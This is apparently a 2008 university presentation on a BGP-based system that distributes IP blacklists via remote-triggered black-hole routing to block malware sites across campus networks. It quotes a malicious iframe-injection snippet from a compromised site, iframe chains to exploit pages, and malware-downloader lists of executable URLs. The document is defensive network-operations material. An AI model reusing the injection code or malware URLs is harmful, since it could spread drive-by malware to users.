基于BGP协议的IP黑名单分发系统

基于BGP协议的

IP黑名单分发系统张焕杰Email/msn:james@

中国科学技术大学网络信息中心2008-12-192024/9/231基于BGP协议的IP黑名单分发系统主要内容IP黑名单介绍基于BGP协议的IP黑名单分发系统结构接收黑名单的路由器配置测试情况结语2024/9/232基于BGP协议的IP黑名单分发系统IP黑名单介绍IP黑名单（IPblacklist）是指被设置成禁止通信的IP地址。管理完备的网络中，往往会设置IP黑名单列表。发往IP黑名单的数据包，不会被正常地转发被丢弃（称为blackholeroute，即黑洞路由，一般是送到Null0空接口）或发送到特殊的目的地（称为sinkhole路由，送到专门的流量处理设备进一步处理）。IP黑名单的应用，可以显著的减轻DDoS攻击的危害，也可以减慢网络蠕虫的传播。2024/9/233基于BGP协议的IP黑名单分发系统IP黑名单介绍（2）如最近年很多校园网都受到很多木马程序的影响。目前反向连接的木马占主流，并且多采用被动传播方式。木马下载网站是木马传播的主要途径，木马程序利用网站做跳板传播或更新。一旦把这些网站IP地址添加到IP黑名单，禁止正常计算机与它的通信，这些木马程序的传播就无法进行，很快就能抑制住校园网内木马程序的传播，ARP欺骗等影响网络稳定的事件在校园网明显减少。同样可以减少黄色网站、钓鱼网站等的影响。2024/9/234基于BGP协议的IP黑名单分发系统恶意网站的实例内嵌恶意代码的网站多用于被动传播木马浏览器访问时，如果存在漏洞，会自动下载木马软件等恶意软件，在用户后台执行通常利用flash、realplayer、windows下的漏洞这些网站往往会被嵌入到正常的网站上，俗称被“挂马”恶意代码中转站为了帮助木马程序的更新，设立一些下载网站，木马程序启动后，自动下载最新的程序代码2024/9/235基于BGP协议的IP黑名单分发系统一个“挂马”例子深圳职业技术学院汽车与交通学院http:///ReadNews.asp?NewsID=809这个网页中有下面一段代码<scriptsrc=/1.js>1.js内容是<iframe

src=/a0076159/a07.htmwidth=100height=0></iframe>/a0076159/a07.htm的内容是<iframewidth=100height=0src=new.html></iframe>new.html是利用几个媒体播放漏洞下载恶意软件的代码2024/9/236基于BGP协议的IP黑名单分发系统一个“挂马”例子[wide]/[script]/ads/gb.js[frame]/a11.html[frame]/index.html[frame]/fl.htm[frame]/i11.html[frame]/cx.htm[object]/bak.css[frame]/06014.htm[object]/bak.css[frame]/I7.htm[object]/yg.exe[frame]/ff.htm[object]/bak.css[frame]/real10.htm[object]/bak.css[frame]/real11.htm[object]/bak.css[script]/855299/ystat.js最近利用IE70day攻击的恶意程序2024/9/237基于BGP协议的IP黑名单分发系统一个网站被挂了多个“马”LogisgeneratedbyFreShow.

[wide]/

[script]/include/javascript/common.js

[frame]/b7.htm?a023

[frame]/flash.htm

[frame]/14.htm

[frame]/office.htm

[frame]/lz.htm

[frame]/re10.htm

[frame]/re11.htm

[frame]/fs/7.htm

[frame]/a192/fxx.htm

[frame]/a192/fx.htm

[frame]/a192/ilink.html

[frame]/a192/flink.html

[frame]/a192/ss.html

[frame]/a192/ms06014.htm

[frame]/a192/GLWORLD.html

[frame]/sina.htm

[frame]/UU.htm

[frame]/a192/Thunder.html

[frame]/a192/real.htm

[frame]/a192/Real.html2024/9/238基于BGP协议的IP黑名单分发系统恶意代码中转站感染病毒的机器会下载/1234.txt

这个文件内容是

[oo]

c0=http://1.111991.net/0.exe

c1=http://1.111991.net/1.exe

c2=http://1.111991.net/2.exe

c3=http://1.111991.net/3.exe

c4=http://1.111991.net/4.exe

c5=http://1.111991.net/5.exe

c6=http://1.111991.net/6.exe

c7=http://1.111991.net/7.exe

c8=http://1.111991.net/8.exe2008年5月5日开始关注类似的访问序列2024/9/239基于BGP协议的IP黑名单分发系统恶意代码中转站(2)http:///ko.txt内容是：[file]open=yurl1=http://111./new/new1.exeurl2=http://111./new/new2.exeurl3=http://111./new/new3.exeurl4=http://111./new/new4.exeurl5=http://111./new/new5.exeurl6=http://111./new/new6.exe2024/9/2310基于BGP协议的IP黑名单分发系统获取以上信息的方式某些安全论坛，如

/bbs/forum-31-1.html

/forumdisplay.php?fid=22http:///report.asp从校园网对外访问的日志中分析查找访问较明显序列的日志，如1.exe2.exe3.exe发现可疑的URL，可以把下载的文件提交给

/

测试，检查是否是恶意软件通过以上方式,经过几个月的累计,我们已经搜集了700余条IP黑名单2024/9/2311基于BGP协议的IP黑名单分发系统恶意网站的一般封堵方法客户端封堵某些浏览器或个人防火墙在访问恶意网站的时候，会给出提示，并阻挡访问校园出口封锁防火墙检测到下载恶意软件时可以阻挡IPS入侵防御系统可以阻断管理员手工增加黑名单路由，更新复杂，维护成本高网络主干封锁增加黑名单路由，发往这些地方的数据包被丢弃教育网主干增加了约150条黑名单路由，禁止对这些IP的访问但由于大部分学校都用其他出口，因此封堵效果一般2024/9/2312基于BGP协议的IP黑名单分发系统教育网主干网黑名单路由例子hef1-bgw>showiproute|incB9[200/70]via,2d11hB96[200/70]via,2d11hB19[200/70]via,2d11hB36[200/70]via,2d11hB36/32[200/70]via,2d11hB04/32[200/70]via,2d11hB89/32[200/70]via,2d11hB13/32[200/70]via,2d11hB32[200/70]via,2d11hB34/32[200/70]via,2d11hB3/32[200/70]via,2d11h2024/9/2313基于BGP协议的IP黑名单分发系统在路由器上封锁IP的方式首先在路由器上增加null0路由iproute55null0把要封锁IP的下一跳设置为,如要封锁3,有两种方式直接手工增加静态路由

iproute355

需要在所有路由器上增加利用BGP注入路由（远程触发黑洞路由，Remote-TriggeredBlackHoleRouting

）在一个触发路由器上增加，利用BGP广播给其他路由器做法可以参考/3c6vl7

（WormMitigationTechnicalDetails

）2024/9/2314基于BGP协议的IP黑名单分发系统远程触发黑洞路由优缺点优点在一台触发路由器上配置，自动广播到其他路由器，使用方便数据包是在最近的路由器上丢弃缺点手工修改配置比较麻烦无法有效的跟踪相关信息(如：什么时候增加的，增加的原因)无法自动删除黑名单，必须要手工删除总之，管理员比较辛苦2024/9/2315基于BGP协议的IP黑名单分发系统基于BGP协议的

IP黑名单分发系统黑名单信息存放在数据库中黑名单信息管理方式管理员通过Web界面添加/删除黑名单程序与入侵检测系统自动进行添加/删除管理员在添加时可以设置有效期，到期后自动删除通过一个简单的BGP客户端，把数据库里的黑名单信息发送给路由器剩下的操作与传统远程触发黑洞路由完全一样2024/9/2316基于BGP协议的IP黑名单分发系统系统结构WEB界面管理数据库路由服务器路由器BGP协议管理员BGP协议2024/9/2317基于BGP协议的IP黑名单分发系统简化的BGP客户端程序BGP很复杂，但是BGP的协议很简单每条消息不能超过4096字节消息头固定19字节4种消息类型OPEN建立tcp连接后发送，协商一些参数UPDATE增加或撤回路由NOTIFICATION出错时KEEPALIVE定时发送2024/9/2318基于BGP协议的IP黑名单分发系统UPDATE广播增加路由信息例如增加一条路由73/32003802

消息长度56(0x38)字节，类型UPDATE(02)0000Withdraw信息长度为0(无withdaw路由)001CTotalPathAttributeLength=28(0x1c)字节400100ORIGIN:IGP400200ASPATH:空400304C0000201NEXT_HOP:8004040000

0014MED204005040000

0054

Local_Pref10020前缀长度32DEBFFBAD732024/9/2319基于BGP协议的IP黑名单分发系统UPDATE广播撤回路由信息例如撤回一条路由73/32001C02

消息长度28(0x1c)字节，类型UPDATE(02)0005WithdrawnRoutesLength=520

前缀长度32DEBFDBAD730000TotalPathAttributeLength=0字节2024/9/2320基于BGP协议的IP黑名单分发系统接收黑名单的路由器配置WEB界面管理数据库路由服务器路由器BGP协议BGP协议备用路由服务器BGP协议2024/9/2321基于BGP协议的IP黑名单分发系统接收IP黑名单路由器上的配置routerbgp65500

nosynchronization

bgplog-neighbor-changes

neighbor7remote-as24362

neighbor7ebgp-multihop255

neighbor41remote-as24362

neighbor41ebgp-multihop255

noauto-summaryiproute55Null0iproute755next_hopiproute4155next_hop注：65500是自治域号，随便使用一个号就可以Next_hop是到741的网关741是路由服务器IP2024/9/2322基于BGP协议的IP黑名单分发系统BGP连接正常的信息#showip

bgpneighborsBGPneighboris7,remoteAS24362,externallinkBGPversion4,remoterouterID7BGPstate=Established,upfor6d01h…SentRcvdPrefixactivity:--------PrefixesCurrent:0699(Consumes33552bytes)PrefixesTotal:0700ImplicitWithdraw:00ExplicitWithdraw:01Usedasbestpath:n/a6602024/9/2323基于BGP协议的IP黑名单分发系统BGP连接正常的信息(2)#showip

bgpBGPtableversionis703,localrouterIDis1Statuscodes:ssuppressed,ddamped,hhistory,*valid,>best,i-internal,SStaleOrigincodes:i-IGP,e-EGP,?-incompleteNetworkNextHopMetricLocPrfWeightPath*43/32024362i*>024362i*7/32024362i*>024362i*0/32024362i*>024362i*1/32024362i*>024362i2024/9/2324基于BGP协议的IP黑名单分发系统测试情况2008年7月开始在中国科大校园网使用这样方式来管理黑名单，有安徽4所大学,省外3所(东北大学、兰州大学、电子科大）在使用这个黑名单目前封锁了700个IPhttp:///至今运行稳定节省了各个学校自己维护